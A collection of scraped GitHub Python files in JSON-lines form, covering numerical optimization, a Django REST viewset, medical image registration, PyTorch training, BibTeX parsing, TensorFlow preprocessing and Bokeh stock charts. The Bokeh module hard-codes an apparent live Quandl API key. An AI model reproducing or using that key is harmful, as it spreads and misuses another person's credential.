datasets\nfrom sklearn.model_selection import train_test_split\nfrom sympy import *\nimport task1 as t1\nimport task2 as t2\nimport task6 as t6\n\n\ndef get_name(method):\n return method.__name__.replace('_', ' ').capitalize()\n\n\ndef create_matrix(condition_number, n):\n r = sqrt(condition_number)\n A = np.random.randn(n, 
n)\n u, s, v = np.linalg.svd(A)\n h, l = np.max(s), np.min(s)\n\n def f(x):\n return h * (1 - ((r - 1) / r) / (h - l) * (h - x))\n\n new_s = f(s)\n new_A = (u * new_s) @ v.T\n new_A = new_A @ new_A.T\n\n return new_A\n\n\ndef number_of_iters(cond, n_vars, step_chooser=t1.dichotomy, n_checks=10):\n all_iters = 0\n for _ in range(n_checks):\n A = create_matrix(cond, n_vars)\n b = np.random.randn(n_vars)\n init_x = np.random.randn(n_vars)\n\n def func(*args):\n x = np.array(args)\n return x.dot(A).dot(x) - b.dot(x)\n\n _, iter_num = t2.gradient_descention(func, *init_x, eps=1e-3, max_iter_num=20,\n step_f=partial(t6.to_step_f, step_chooser))\n\n all_iters += iter_num\n return all_iters / n_checks\n\n\n\ndef draw_condition():\n n_vars = list(range(2, 6))\n condition_numbers = np.linspace(1, 10, 5)\n plt.figure()\n for n in n_vars:\n iter_numbers = [number_of_iters(cond, n) for cond in condition_numbers]\n plt.plot(condition_numbers, iter_numbers, label=f'n={n}')\n\n plt.xlabel('$\\mu$')\n plt.ylabel('$T(n, k)$')\n plt.legend()\n plt.show()\n","repo_name":"Good-Morning/optimizative_jabas","sub_path":"mo/hw1/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8438072674","text":"from drf_yasg.utils import swagger_auto_schema\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\n\nfrom apps.vehicle.models import Vehicle\nfrom apps.vehicle.serializers import VehicleSerializer, VehicleUpdateSerializer, VehicleReadSerializer\n\n\nclass VehicleViewSet(ViewSet):\n permission_classes = [IsAuthenticated]\n\n def list(self, request):\n queryset = Vehicle.objects.all()\n policemen_serialized = VehicleReadSerializer(queryset, many=True)\n return Response(policemen_serialized.data)\n\n @swagger_auto_schema(request_body=VehicleSerializer)\n def create(self, request):\n serializer = VehicleSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n vehicle = serializer.create(serializer.validated_data)\n vehicle_serialized = VehicleSerializer(vehicle)\n return Response(vehicle_serialized.data)\n\n def retrieve(self, request, plate=None):\n queryset = Vehicle.objects.all()\n vehicle = get_object_or_404(queryset, plate=plate)\n vehicle_serialized = VehicleReadSerializer(vehicle)\n return Response(vehicle_serialized.data)\n\n @swagger_auto_schema(request_body=VehicleUpdateSerializer)\n def update(self, request, plate=None):\n queryset = Vehicle.objects.all()\n vehicle = get_object_or_404(queryset, plate=plate)\n serializer = VehicleUpdateSerializer(vehicle, data=request.data)\n serializer.is_valid(raise_exception=True)\n vehicle_updated = serializer.update(vehicle, serializer.validated_data)\n vehicle_updated_serialized = VehicleSerializer(vehicle_updated)\n return Response(vehicle_updated_serialized.data)\n\n def destroy(self, request, plate=None):\n queryset = Vehicle.objects.all()\n vehicle = get_object_or_404(queryset, plate=plate)\n vehicle.delete()\n return Response({'response': 'the vehicle was deleted successfully'})","repo_name":"julianpulecio/infraction_app","sub_path":"apps/vehicle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73694889924","text":"import numpy as 
np\nimport SimpleITK as sitk\nimport os, math, sys\nimport ndreg2D\n\ndimension = 2\naffine = sitk.AffineTransform(dimension)\nidentityAffine = list(affine.GetParameters())\nidentityDirection = list(affine.GetMatrix())\nzeroOrigin = [0]*dimension\nzeroIndex = [0]*dimension\n\ndef main():\n target = sitk.ReadImage(sys.argv[1], sitk.sitkFloat32)\n template = sitk.ReadImage(sys.argv[2], sitk.sitkFloat32)\n translation = registrationTranslation(target, template, identityAffine, 0.4, 0.02, 0.0005)\n translation = registrationTranslation(target, template, translation, 0.35, 0.005, 0.0001)\n euler2d = registrationEuler2D(target, template, translation, 0.2, 0.02, 0.00005)\n euler2d = registrationEuler2D(target, template, euler2d, 0.06, 0.005, 0.000025)\n euler2d = registrationEuler2D(target, template, translation, 0.04, 0.002, 0.000025)\n outImg = ndreg2D.imgApplyAffine2D(template, euler2d, size=target.GetSize())\n sitk.WriteImage(outImg, sys.argv[3])\n mytransformfile = open(sys.argv[4], \"w\")\n for item in euler2d:\n mytransformfile.write(\"%s\\n\" % item)\n \n mytransformfile.close()\n return\n\ndef registrationTranslation(target, template, initialTransform, smoothingRadius, mylearningRate, myminStep):\n interpolator = sitk.sitkLinear\n transtransform = sitk.TranslationTransform(dimension)\n transtransform.SetOffset(initialTransform[4:6])\n registration = sitk.ImageRegistrationMethod()\n registration.SetInterpolator(interpolator)\n registration.SetInitialTransform(transtransform)\n numHistogramBins = 64\n registration.SetMetricAsMattesMutualInformation(numHistogramBins)\n iterations = 10000\n registration.SetOptimizerAsRegularStepGradientDescent(learningRate=mylearningRate,numberOfIterations=iterations,estimateLearningRate=registration.EachIteration,minStep=myminStep)\n registration.Execute(sitk.SmoothingRecursiveGaussian(target,smoothingRadius),sitk.SmoothingRecursiveGaussian(template,smoothingRadius) )\n translation = identityAffine[0:dimension**2] + list(transtransform.GetOffset())\n return translation\n\ndef registrationEuler2D(target, template, initialTransform, smoothingRadius, mylearningRate, myminStep):\n interpolator = sitk.sitkLinear\n transform = sitk.Euler2DTransform()\n transform.SetTranslation(initialTransform[4:6])\n transform.SetMatrix(initialTransform[0:4])\n registration = sitk.ImageRegistrationMethod()\n registration.SetInterpolator(interpolator)\n registration.SetInitialTransform(transform)\n numHistogramBins = 64\n registration.SetMetricAsMattesMutualInformation(numHistogramBins)\n iterations = 10000\n registration.SetOptimizerAsRegularStepGradientDescent(learningRate=mylearningRate,numberOfIterations=iterations,estimateLearningRate=registration.EachIteration,minStep=myminStep)\n registration.Execute(sitk.SmoothingRecursiveGaussian(target,smoothingRadius),sitk.SmoothingRecursiveGaussian(template,smoothingRadius) )\n euler2d = list(transform.GetMatrix()) + list(transform.GetTranslation())\n return euler2d\n\nif __name__==\"__main__\":\n main()\n\n","repo_name":"bingxinghuo/Connectivity_matrix","sub_path":"xregist/rigidFluoroToNissl.py","file_name":"rigidFluoroToNissl.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"38261661537","text":"import torch\nimport time\nimport os\nfrom tqdm import tqdm\n\nfrom utils.Confusion import ConfusionMatrix\n\n\nfrom opt import parse_opt\n\nopt = parse_opt()\n\n\nclass Trainer:\n def __init__(self, model, train_loader, test_loader, 
criterion, optimizer, lr_scheduler, early_stopping):\n self.model = model\n self.train_loader = train_loader\n self.test_loader = test_loader\n self.criterion = criterion\n self.optimizer = optimizer\n self.lr_scheduler = lr_scheduler\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.model.to(self.device)\n self.early_stopping = early_stopping\n\n def train(self, num_epochs, model_path):\n start = time.time()\n model_path = model_path + '/best.pt'\n for epoch in range(num_epochs):\n self.model.train()\n running_loss = 0.0\n correct = 0\n total = 0\n total_step = len(self.train_loader)\n # 创建一个进度条,并设置总共的step数量\n loop = tqdm(enumerate(self.train_loader), total=len(self.train_loader))\n for i, (inputs, labels) in loop:\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n self.optimizer.zero_grad()\n\n outputs = self.model(inputs)\n loss = self.criterion(outputs, labels)\n loss.backward()\n self.optimizer.step()\n\n running_loss += loss.item()\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n running_acc = correct / total\n\n # 更新训练信息\n loop.set_description(f'Epoch [{epoch+1}/{num_epochs}]')\n loop.set_postfix(loss=loss.item(), acc=running_acc)\n\n train_loss = running_loss / total_step\n train_acc = correct / total\n\n test_loss, test_acc = self.test()\n\n self.lr_scheduler.step(test_acc)\n if opt.monitor == 'acc':\n self.early_stopping(test_acc, self.model, model_path)\n else:\n self.early_stopping(test_loss, self.model, model_path)\n\n print('Epoch [{}/{}], Train Loss: {:.4f}, Train Acc: {:.4f}, Test Loss: {:.4f}, Test Acc: {:.4f}'\n .format(epoch + 1, num_epochs, train_loss, train_acc, test_loss, test_acc))\n\n if self.early_stopping.early_stop:\n print(\"Early Stopping\")\n break\n end = time.time()\n print('train time cost: {:.5f}'.format(end-start))\n\n def test(self):\n self.model.eval()\n running_loss = 0.0\n correct = 0\n total = 0\n\n with torch.no_grad():\n for i, (inputs, labels) in enumerate(self.test_loader):\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n\n outputs = self.model(inputs)\n loss = self.criterion(outputs, labels)\n\n running_loss += loss.item()\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n test_loss = running_loss / len(self.test_loader)\n test_acc = correct / total\n\n return test_loss, test_acc\n\n def test_confusion(self, path, initial_checkpoint):\n f = torch.load(initial_checkpoint)\n self.model.load_state_dict(f)\n\n # read class_indict\n labels = os.listdir(path)\n confusion = ConfusionMatrix(num_classes=opt.num_classes, labels=labels)\n\n start = time.time()\n self.model.eval()\n running_loss = 0.0\n correct = 0\n total = 0\n\n with torch.no_grad():\n for i, (inputs, labels) in enumerate(self.test_loader):\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n\n outputs = self.model(inputs)\n\n loss = self.criterion(outputs, labels)\n\n running_loss += loss.item()\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n confusion.update(predicted.cpu().numpy(), labels.cpu().numpy())\n end = time.time()\n confusion.plot()\n confusion.summary()\n print(\"test_confusion time cost: {:.5f} sec\".format(end - start))\n\n test_loss = running_loss / len(self.test_loader)\n test_acc = correct / total\n\n return test_loss, 
test_acc\n","repo_name":"PolarRegion/Bilinear_Dense","sub_path":"utils/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38175594960","text":"# Tuple liste ile aynı sadece atama sonrasında eleman üzerinde değişim yapılmıyor sadece toplu bir şekilde değişiyor\r\n\r\nlist = [1, 2, 3]\r\ntuple = (1, \"iki\", 3)\r\n\r\nlist = [\"ali\", \"veli\"]\r\ntuple = (\"damla\", \"ayşe\")\r\n\r\nprint(list)\r\nprint(tuple )","repo_name":"omerdagistanli/BTK_Akademi_Sifirdan_Ileri_Seviye_Python_Programlama","sub_path":"1-Python Objeleri ve Veri Yapıları/3.0-Tuple.py","file_name":"3.0-Tuple.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"30049312118","text":"# -*- coding: utf-8 -*-\n\n\nimport re\nimport collections\n\nfrom zotero_bibtize.bibkey_formatter import KeyFormatter\n\n\nclass BibEntry(object):\n def __init__(self, bibtex_entry_string, key_format=None, omit_fields=None):\n # check for fields not required\n self.fields_to_omit = []\n if omit_fields is not None:\n self.fields_to_omit = omit_fields.split(',')\n self._raw = bibtex_entry_string\n entry_type, entry_key, entry_fields = self.entry_fields(self._raw)\n # set internal variables\n self.type = entry_type\n if key_format is not None:\n key_formatter = KeyFormatter(entry_fields, entry_type=entry_type)\n self.key = key_formatter.generate_key(key_format)\n else:\n self.key = entry_key\n self.fields = entry_fields\n \n def entry_fields(self, bibtex_entry_string):\n \"\"\"Disassemble the bibtex entry contents.\"\"\"\n # revert zotero escaping\n etype, ekey, econtent = self.bibtex_entry_contents(bibtex_entry_string)\n # disassemble the field entries (use ordered dict to assure output\n # order matches the input order for python versions < 3.6, this is not\n # of practical importance for generated bib-files but allows for \n # easier tests based on file comparison)\n fields = collections.OrderedDict()\n for field in econtent:\n key, content = self.field_label_and_contents(field)\n # skip if field was set to be omitted\n if key in self.fields_to_omit: continue \n fields[key] = content\n return etype, ekey, fields\n\n def field_label_and_contents(self, field):\n \"\"\"Extract the field label and the corresponding content.\"\"\"\n field, count = re.subn(r'^(\\s*)|(\\s*)$', '', field)\n # needs a separate expression for matching months which are\n # not exported with surrounding braces...\n regex = r'^([\\s\\S]*?)\\s+\\=\\s+(?:\\{([\\s\\S]*)\\}|([\\s\\S]*)),*?$'\n fmatch = re.match(regex, field)\n field_key = fmatch.group(1)\n field_content = fmatch.group(2) or fmatch.group(3)\n return field_key, field_content\n\n def bibtex_entry_contents(self, raw_entry_string):\n \"\"\"Unescape the entry string and get the contained contents.\"\"\"\n # revert zotero escpaing and remove trailing / leading whitespaces\n unescaped = self.unescape_bibtex_entry_string(raw_entry_string)\n unescaped = re.sub(r'^(\\s*)|(\\s*)$', '', unescaped)\n entry_match = re.match(r'^\\@([\\s\\S]*?)\\{([\\s\\S]*?)\\}$', unescaped)\n entry_type, entry_content = entry_match.group(1, 2)\n # check if the unescaped bibtex entry is valid\n if not self._is_balanced(entry_content):\n raise Exception(\"Found braces unbalanced after unescaping of \"\n \"BibTeX entry. 
The offending entry was\\n\\n\"\n \"{}\".format(raw_entry_string))\n entry_content = []\n tmp_entry = ''\n for part in re.split(r\",\", entry_match.group(2)):\n tmp_entry += re.sub(r'\\n', '', part)\n # since _is_balanced also returns True for strings containing\n # no braces at this also works for the initial bibentry key\n if self._is_balanced(tmp_entry):\n entry_content.append(re.sub(r'\\n', '', tmp_entry))\n tmp_entry = ''\n else: # re-introduce comma if unbalanced\n tmp_entry += ','\n # remove possible emtpy entry at the end of the array\n if not entry_content[-1]:\n entry_content = entry_content[:-1]\n # return type, original zotero key and the actual content list \n return (entry_type, entry_content[0], entry_content[1:])\n\n def unescape_bibtex_entry_string(self, entry):\n \"\"\"Remove zotero escapes and additional braces.\"\"\"\n entry = self.remove_zotero_escaping(entry)\n entry = self.remove_special_char_escaping(entry)\n entry = self.remove_curly_from_capitalized(entry)\n return entry\n\n def remove_zotero_escaping(self, entry):\n # first we remove the escape sequences defined by Zotero\n zotero_escaping_map = {\n\t r\"|\": r\"\\{\\\\textbar\\}\",\n\t r\"<\": r\"\\{\\\\textless\\}\",\n\t r\">\": r\"\\{\\\\textgreater\\}\",\n\t r\"~\": r\"\\{\\\\textasciitilde\\}\",\n\t r\"^\": r\"\\{\\\\textasciicircum\\}\",\n\t r\"\\\\\": r\"\\{\\\\textbackslash\\}\",\n\t r\"{\" : r\"\\\\{\\\\vphantom{\\\\}}\",\n\t r\"}\" : r\"\\\\vphantom{\\\\{}\\\\}\"\n }\n for (replacement, escape_sequence) in zotero_escaping_map.items():\n entry, subs = re.subn(escape_sequence, replacement, entry)\n return entry\n \n def remove_special_char_escaping(self, entry):\n zotero_special_chars = {\n r\"#\": r\"\\\\\\#\",\n r\"%\": r\"\\\\\\%\",\n r\"&\": r\"\\\\\\&\",\n r\"$\": r\"\\\\\\$\",\n r\"_\": r\"\\\\\\_\",\n r\"{\": r\"\\\\\\{\",\n r\"}\": r\"\\\\\\}\",\n }\n for (replacement, escape_sequence) in zotero_special_chars.items():\n entry, subs = re.subn(escape_sequence, replacement, entry)\n return entry\n\n def remove_curly_from_capitalized(self, entry):\n \"\"\"Remove the implicit curly braces added to capitalized words.\"\"\"\n # next remove the implicit curly braces around capitalized words\n regex = r\"\\{[A-Z][\\w]*?\\}\"\n words = re.findall(regex, entry)\n # use set(words) to prevent double replacements\n for word in set(words):\n entry = entry.replace(word, word.lstrip(\"{\").rstrip(\"}\"))\n return entry\n\n def _is_balanced(self, string):\n \"\"\"\n Check if opening and closing curly braces are balanced in string.\n\n :param str string: string to be checked for balanced braces\n \"\"\"\n n_open = len(re.findall(r\"\\{\", string))\n n_close = len(re.findall(r\"\\}\", string))\n return n_open == n_close\n\n def __str__(self):\n # return bibtex entry as string\n content = ['@{}{{{}'.format(self.type, self.key)]\n for (field_key, field_content) in self.fields.items():\n content.append(' {} = {{{}}}'.format(field_key, field_content))\n return \",\\n\".join(content) + '\\n}\\n'\n\n\nclass BibTexFile(object):\n \"\"\"Bibtext file contents\"\"\"\n def __init__(self, bibtex_file, key_format=None, omit_fields=None):\n self.bibtex_file = bibtex_file\n self.entries = []\n self.key_map = collections.defaultdict(list)\n for (index, entry) in enumerate(self.parse_bibtex_entries()):\n bibentry = BibEntry(entry, key_format=key_format, \n omit_fields=omit_fields)\n self.entries.append(bibentry)\n self.key_map[bibentry.key].append(index)\n self.resolve_unambiguous_keys()\n\n def parse_bibtex_entries(self):\n 
\"\"\"Parse entries from file.\"\"\"\n bibtex_content_str = self.load_bibtex_contents()\n entry_locations = self.strip_down_entries(bibtex_content_str)\n entries = []\n for (entry_start, entry_stop) in entry_locations:\n entry_str = bibtex_content_str[entry_start:entry_stop]\n entries.append(entry_str)\n return entries\n\n def load_bibtex_contents(self):\n \"\"\"Load the file contents into a string.\"\"\"\n with open(self.bibtex_file, 'r') as bibfile:\n contents = bibfile.read()\n return contents\n \n def strip_down_entries(self, content):\n \"\"\"Identify single entries in the bibtex output file.\"\"\"\n content_iterator = enumerate(content)\n bibtex_entries = []\n for (index, char) in content_iterator:\n if char == '@':\n start_index = index\n if char == '{':\n stack = 1\n while stack != 0:\n try:\n next_index, next_char = next(content_iterator)\n except StopIteration:\n raise Exception(\"Unbalanced braces error during the \"\n \"parsing of entry {}\".format(content))\n if next_char == '}':\n stack -= 1\n elif next_char == '{':\n stack += 1\n bibtex_entries.append((start_index, next_index+1))\n return bibtex_entries\n\n def num_to_char(self, number):\n \"\"\"\n Map the given number on chars a-z.\n\n All numbers N for 0 <= N <= 25 will be mapped on the chars a-z\n and numbers N > 25 will be mapped on the chars aa-zz.\n\n :param int number: number transformed to char representation\n \"\"\"\n offset = ord('a')\n minor = number % 26\n major = number // 26 - 1\n return chr(offset + major) * (major >= 0) + chr(offset + minor)\n\n def resolve_unambiguous_keys(self):\n \"\"\"Resolve ambiguous bibtex keys.\"\"\"\n for (key, indices) in self.key_map.items():\n # do nothing if the key is unique already\n if len(indices) == 1: continue\n # otherwise append a-z / aa-zz to the key\n for (i, index) in enumerate(indices):\n self.entries[index].key = key + self.num_to_char(i)\n","repo_name":"astamminger/zotero-bibtize","sub_path":"zotero_bibtize/zotero_bibtize.py","file_name":"zotero_bibtize.py","file_ext":"py","file_size_in_byte":9235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"31638448442","text":"import tensorflow.compat.v1 as tf\n\nDEFAULT_CROP_PROPORTION = 0.875 # Inception default.\nMEAN_RGB = [0.485, 0.456, 0.406]\nSTDDEV_RGB = [0.229, 0.224, 0.225]\n\n\ndef distorted_bounding_box_crop(image,\n bbox,\n min_object_covered=0.1,\n aspect_ratio_range=(0.75, 1.33),\n area_range=(0.05, 1.0),\n max_attempts=100,\n scope=None):\n \"\"\"Generates cropped_image using one of the bboxes randomly distorted.\n\n See `tf.image.sample_distorted_bounding_box` for more documentation.\n\n Args:\n image: `Tensor` of image data.\n bbox: `Tensor` of bounding boxes arranged `[1, num_boxes, coords]`\n where each coordinate is [0, 1) and the coordinates are arranged\n as `[ymin, xmin, ymax, xmax]`. If num_boxes is 0 then use the whole\n image.\n min_object_covered: An optional `float`. Defaults to `0.1`. The cropped\n area of the image must contain at least this fraction of any bounding\n box supplied.\n aspect_ratio_range: An optional list of `float`s. The cropped area of the\n image must have an aspect ratio = width / height within this range.\n area_range: An optional list of `float`s. The cropped area of the image\n must contain a fraction of the supplied image within in this range.\n max_attempts: An optional `int`. Number of attempts at generating a cropped\n region of the image of the specified constraints. 
After `max_attempts`\n failures, return the entire image.\n scope: Optional `str` for name scope.\n Returns:\n (cropped image `Tensor`, distorted bbox `Tensor`).\n \"\"\"\n with tf.name_scope(scope, 'distorted_bounding_box_crop', [image, bbox]):\n shape = tf.shape(image)\n sample_distorted_bounding_box = tf.image.sample_distorted_bounding_box(\n shape,\n bounding_boxes=bbox,\n min_object_covered=min_object_covered,\n aspect_ratio_range=aspect_ratio_range,\n area_range=area_range,\n max_attempts=max_attempts,\n use_image_if_no_bounding_boxes=True)\n bbox_begin, bbox_size, _ = sample_distorted_bounding_box\n\n # Crop the image to the specified bounding box.\n offset_y, offset_x, _ = tf.unstack(bbox_begin)\n target_height, target_width, _ = tf.unstack(bbox_size)\n image = tf.image.crop_to_bounding_box(\n image, offset_y, offset_x, target_height, target_width)\n\n return image\n\n\ndef _random_crop(image, height, width):\n \"\"\"Make a random crop of height `height` and width `width`.\n\n Args:\n image: Tensor representing the image.\n height: Desired image height.\n width: Desired image width.\n\n Returns:\n A `height` x `width` x channels Tensor holding a random crop of `image`.\n \"\"\"\n bbox = tf.constant([0.0, 0.0, 1.0, 1.0], dtype=tf.float32, shape=[1, 1, 4])\n aspect_ratio = width / height\n image = distorted_bounding_box_crop(\n image,\n bbox,\n min_object_covered=0.1,\n aspect_ratio_range=(3. / 4 * aspect_ratio, 4. / 3. * aspect_ratio),\n area_range=(0.08, 1.0),\n max_attempts=100,\n scope=None)\n return tf.image.resize_bicubic([image], [height, width])[0]\n\n\ndef _compute_crop_shape(\n image_height, image_width, aspect_ratio, crop_proportion):\n \"\"\"Compute aspect ratio-preserving shape for central crop.\n\n The resulting shape retains `crop_proportion` along one side and a proportion\n less than or equal to `crop_proportion` along the other side.\n\n Args:\n image_height: Height of image to be cropped.\n image_width: Width of image to be cropped.\n aspect_ratio: Desired aspect ratio (width / height) of output.\n crop_proportion: Proportion of image to retain along the less-cropped side.\n\n Returns:\n crop_height: Height of image after cropping.\n crop_width: Width of image after cropping.\n \"\"\"\n image_width_float = tf.cast(image_width, tf.float32)\n image_height_float = tf.cast(image_height, tf.float32)\n\n def _requested_aspect_ratio_wider_than_image():\n crop_height = tf.cast(tf.rint(\n crop_proportion / aspect_ratio * image_width_float), tf.int32)\n crop_width = tf.cast(tf.rint(\n crop_proportion * image_width_float), tf.int32)\n return crop_height, crop_width\n\n def _image_wider_than_requested_aspect_ratio():\n crop_height = tf.cast(\n tf.rint(crop_proportion * image_height_float), tf.int32)\n crop_width = tf.cast(tf.rint(\n crop_proportion * aspect_ratio *\n image_height_float), tf.int32)\n return crop_height, crop_width\n\n return tf.cond(\n aspect_ratio > image_width_float / image_height_float,\n _requested_aspect_ratio_wider_than_image,\n _image_wider_than_requested_aspect_ratio)\n\n\ndef _center_crop(image, height, width, crop_proportion):\n \"\"\"Crops to center of image and rescales to desired size.\n\n Args:\n image: Image Tensor to crop.\n height: Height of image to be cropped.\n width: Width of image to be cropped.\n crop_proportion: Proportion of image to retain along the less-cropped side.\n\n Returns:\n A `height` x `width` x channels Tensor holding a central crop of `image`.\n \"\"\"\n shape = tf.shape(image)\n image_height = shape[0]\n image_width = 
shape[1]\n crop_height, crop_width = _compute_crop_shape(\n image_height, image_width, height / width, crop_proportion)\n offset_height = ((image_height - crop_height) + 1) // 2\n offset_width = ((image_width - crop_width) + 1) // 2\n image = tf.image.crop_to_bounding_box(\n image, offset_height, offset_width, crop_height, crop_width)\n\n image = tf.image.resize_bicubic([image], [height, width])[0]\n\n return image\n\n\ndef _normalize(image):\n \"\"\"Normalize the image to zero mean and unit variance.\"\"\"\n offset = tf.constant(MEAN_RGB, shape=[1, 1, 3])\n image -= offset\n\n scale = tf.constant(STDDEV_RGB, shape=[1, 1, 3])\n image /= scale\n return image\n\n\ndef _flip(image):\n \"\"\"Random horizontal image flip.\"\"\"\n image = tf.image.random_flip_left_right(image)\n return image\n\n\ndef preprocess_for_train(image, height, width, normalize=True):\n \"\"\"Preprocesses the given image for evaluation.\n\n Args:\n image: `Tensor` representing an image of arbitrary size.\n height: Height of output image.\n width: Width of output image.\n normalize: If `True`, normalize by subtracting per-channel mean and dividing\n by per-channel standard deviation, as computed across the entire\n ImageNet training set. If `False`, the returned image will be\n approximately in the range [0, 1], although some pixels may be outside\n this range due to bicubic interpolation.\n\n Returns:\n A preprocessed image `Tensor`.\n \"\"\"\n image = _random_crop(image, height, width)\n if normalize:\n image = _normalize(image)\n image = _flip(image)\n image = tf.reshape(image, [height, width, 3])\n return image\n\n\ndef preprocess_for_eval(image, height, width, crop=True,\n crop_proportion=DEFAULT_CROP_PROPORTION,\n normalize=True):\n \"\"\"Preprocesses the given image for evaluation.\n\n Args:\n image: `Tensor` representing an image of arbitrary size.\n height: Height of output image.\n width: Width of output image.\n crop: If is_training is `False`, determines whether the function should\n extract a central crop of the images (as for standard ImageNet\n evaluation), or rescale the full image without cropping.\n crop_proportion: Proportion of image to crop, if `crop` is True.\n normalize: If `True`, normalize by subtracting per-channel mean and dividing\n by per-channel standard deviation, as computed across the entire\n ImageNet training set. 
If `False`, the returned image will be\n approximately in the range [0, 1], although some pixels may be outside\n this range due to bicubic interpolation.\n\n Returns:\n A preprocessed image `Tensor`.\n \"\"\"\n image = _center_crop(image, height, width,\n crop_proportion=crop_proportion if crop else 1)\n if normalize:\n image = _normalize(image)\n image = tf.reshape(image, [height, width, 3])\n return image\n\n\ndef preprocess_image(image, height, width, is_training=False, crop=True,\n crop_proportion=DEFAULT_CROP_PROPORTION, normalize=True):\n \"\"\"Preprocesses the given image.\n\n Args:\n image: `Tensor` representing an image of arbitrary size.\n height: Height of output image.\n width: Width of output image.\n is_training: `bool` for whether the preprocessing is for training.\n crop: If is_training is `False`, determines whether the function should\n extract a central crop of the images (as for standard ImageNet\n evaluation), or rescale the full image without cropping.\n crop_proportion: If is_training is `False` and crop is `True`,\n the proportion of the image to crop.\n normalize: If `True`, normalize by subtracting per-channel mean and dividing\n by per-channel standard deviation, as computed across the entire\n ImageNet training set. If `False`, the returned image will be\n approximately in the range [0, 1], although some pixels may be outside\n this range due to bicubic interpolation.\n\n Returns:\n A preprocessed image `Tensor`.\n \"\"\"\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n if is_training:\n return preprocess_for_train(image, height, width, normalize=normalize)\n else:\n return preprocess_for_eval(image, height, width, crop,\n crop_proportion=crop_proportion,\n normalize=normalize)\n","repo_name":"google-research/google-research","sub_path":"loss_functions_transfer/resnet_preprocessing.py","file_name":"resnet_preprocessing.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"43649026758","text":"import bokeh\nfrom bokeh.plotting import figure, show, output_file, save, ColumnDataSource\nfrom bokeh.layouts import gridplot\nfrom bokeh.embed import components\nfrom bokeh.palettes import Spectral4\nfrom bokeh.models import HoverTool, NumeralTickFormatter\nfrom math import pi\nimport pandas as pd\nimport numpy as np\nimport quandl\nquandl.ApiConfig.api_key = \"yg94pP6kwTx8vKNJYaDc\"\n# Create your views here.\n\n\ndef volume_helper(ticker, hover, tools, source, p1):\n \"\"\" Creates a volume graph below the chose graph based on stock data with joined interactive x-axis.\n :param ticker:\n :param hover:\n :param tools:\n :param source:\n :param p1:\n :return:\n \"\"\"\n if p1:\n p = figure(plot_width=1000, plot_height=200, x_axis_type='datetime', x_range=p1.x_range,\n active_scroll='wheel_zoom', active_drag='pan', tools=[hover, tools], title='Volume for {}'.format(ticker))\n else:\n p = figure(plot_width=1000, plot_height=200, x_axis_type='datetime', active_scroll='wheel_zoom',\n active_drag='pan', tools=[hover, tools], title='Volume for {}'.format(ticker))\n p.grid.grid_line_alpha = 0.3\n p.xaxis.axis_label = 'Date'\n p.yaxis.axis_label = 'Volume'\n p.line('x', 'Volume', color='#A6CEE3', source=source)\n p.yaxis.formatter = NumeralTickFormatter(format=\"00\")\n p.legend.location = 'top_left'\n return p\n\n\ndef df_date_change(ticker):\n \"\"\"Sets up the dataframe's 'Date' index\"\"\"\n df = quandl.get('WIKI/{}'.format(ticker))\n df = 
df.reset_index()\n df['Date'] = pd.to_datetime(df['Date'])\n return df\n\n\ndef single_stock(ticker):\n \"\"\"Creates an interactive graph based on a ticker with it's Adjusted High, Open, Low, Close\n :param ticker: str\n :return: Bokeh Plot\n \"\"\"\n # choices is OHLC Adj O/C or Vol\n df = df_date_change(ticker)\n source = ColumnDataSource(data=dict(\n x=df['Date'],\n y=df['Adj. High'],\n y1=df['Adj. Open'],\n y2=df['Adj. Low'],\n y3=df['Adj. Close'],\n Volume=df['Volume'],\n ))\n tools = 'pan,wheel_zoom,box_zoom,reset,save'\n hover = HoverTool(tooltips=[\n (\"Date\", \"@x{%F}\"),\n (\"Adj. High\", \"@y\"),\n (\"Adj. Open\", \"@y1\"),\n (\"Adj. Low\", \"@y2\"),\n (\"Adj. Close\", \"@y3\"),\n (\"Volume\", \"@Volume{0.00 a}\"),\n ], formatters={\n 'x': 'datetime',\n },\n mode='mouse'\n )\n p = figure(plot_width=1000, plot_height=400, x_axis_type='datetime', tools=[hover, tools],\n title='{}'.format(ticker), active_scroll='wheel_zoom', active_drag='pan', toolbar_location='above')\n p.grid.grid_line_alpha = 0.3\n p.xaxis.axis_label = 'Date'\n p.yaxis.axis_label = 'Price'\n p.legend.location = 'top_right'\n p.line('x', 'y', legend='Adjusted High', color=Spectral4[0], alpha=0.5, source=source)\n p.line('x', 'y1', legend='Adjusted Open', color=Spectral4[1], alpha=0.5, source=source)\n p.line('x', 'y2', legend='Adjusted Low', color=Spectral4[2], alpha=0.5, source=source)\n p.line('x', 'y3', legend='Adjusted Close', color=Spectral4[3], alpha=0.5, source=source)\n p2 = volume_helper(ticker, hover, tools, source, p)\n p.legend.click_policy = \"hide\"\n return gridplot([p, p2], ncols=1, merge_tools=True, match_aspect=True)\n\n\ndef 